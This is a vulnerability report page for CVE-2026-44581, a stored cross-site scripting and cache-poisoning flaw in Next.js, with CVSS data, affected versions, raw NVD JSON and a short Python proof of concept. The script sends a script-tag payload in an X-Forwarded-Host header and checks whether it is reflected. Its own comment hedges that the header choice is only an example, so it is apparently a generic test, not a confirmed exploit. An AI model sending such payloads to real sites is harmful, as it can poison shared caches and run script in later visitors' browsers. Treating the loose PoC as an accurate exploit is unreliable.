Security Vulnerability Report
CVE-2026-44581 (CVSS 4.7, MEDIUM)

Published: 2026-05-13 18:16:18
Last Modified: 2026-05-14 18:30:24

Description

Next.js is a React framework for building full-stack web applications. From 13.4.0 to before 15.5.16 and 16.2.5, App Router applications that rely on CSP nonces can be vulnerable to stored cross-site scripting when deployed behind shared caches. In affected versions, malformed nonce values derived from request headers could be reflected into rendered HTML in an unsafe way, allowing an attacker to poison cached responses and cause script execution for later visitors. This vulnerability is fixed in 15.5.16 and 16.2.5.

CVSS Details

CVSS Score: 4.7
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:vercel:next.js:*:*:*:*:*:node.js:*:* (Next.js >= 13.4.0, < 15.5.16) - VULNERABLE
cpe:2.3:a:vercel:next.js:*:*:*:*:*:node.js:*:* (Next.js >= 16.0.0, < 16.2.5) - VULNERABLE

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# PoC for CVE-2026-44581: Next.js Cache Poisoning via Malformed Nonce
# Description: Attempts to inject a malformed nonce header to poison the cache.

# Placeholder target; replace with the host under authorized test.
target_url = "http://vulnerable-nextjs-app.com/api/page"

# The attacker sends a request with a header that causes a malformed nonce generation
# which is then reflected unsafely in the HTML.
malicious_headers = {
    "User-Agent": "PoC-Client/1.0",
    "X-Forwarded-Host": "<script>alert(1)</script>",  # Example header influencing nonce/logic
    "Accept-Encoding": "gzip, deflate",
}

try:
    print(f"[*] Sending payload to {target_url}...")
    # A timeout keeps the script from hanging on an unresponsive host.
    response = requests.get(target_url, headers=malicious_headers, timeout=10)

    # Check if the payload is reflected in the response (potential cache poisoning)
    if "<script>alert(1)</script>" in response.text:
        print("[+] Potential vulnerability triggered! Payload reflected in response.")
        print("[+] Cache might be poisoned. Subsequent users may be affected.")
    else:
        print("[-] Payload not reflected.")
except Exception as e:
    print(f"Error: {e}")
```

References

https://github.com/vercel/next.js/security/advisories/GHSA-ffhc-5mcf-pf4q (Vendor Advisory, Mitigation)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-44581",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-13T18:16:18.400",
    "lastModified": "2026-05-14T18:30:24.340",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Next.js is a React framework for building full-stack web applications. From 13.4.0 to before 15.5.16 and 16.2.5, App Router applications that rely on CSP nonces can be vulnerable to stored cross-site scripting when deployed behind shared caches. In affected versions, malformed nonce values derived from request headers could be reflected into rendered HTML in an unsafe way, allowing an attacker to poison cached responses and cause script execution for later visitors. This vulnerability is fixed in 15.5.16 and 16.2.5."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N",
            "baseScore": 4.7,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "HIGH",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 1.6,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          { "lang": "en", "value": "CWE-79" }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:vercel:next.js:*:*:*:*:*:node.js:*:*",
                "versionStartIncluding": "13.4.0",
                "versionEndExcluding": "15.5.16",
                "matchCriteriaId": "A9F82F11-CD68-440C-AFAE-98AF7B8DB69F"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:vercel:next.js:*:*:*:*:*:node.js:*:*",
                "versionStartIncluding": "16.0.0",
                "versionEndExcluding": "16.2.5",
                "matchCriteriaId": "27C5CF7A-7A33-4BE4-B8FD-10BFD813204A"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/vercel/next.js/security/advisories/GHSA-ffhc-5mcf-pf4q",
        "source": "[email protected]",
        "tags": ["Mitigation", "Vendor Advisory"]
      }
    ]
  }
}
```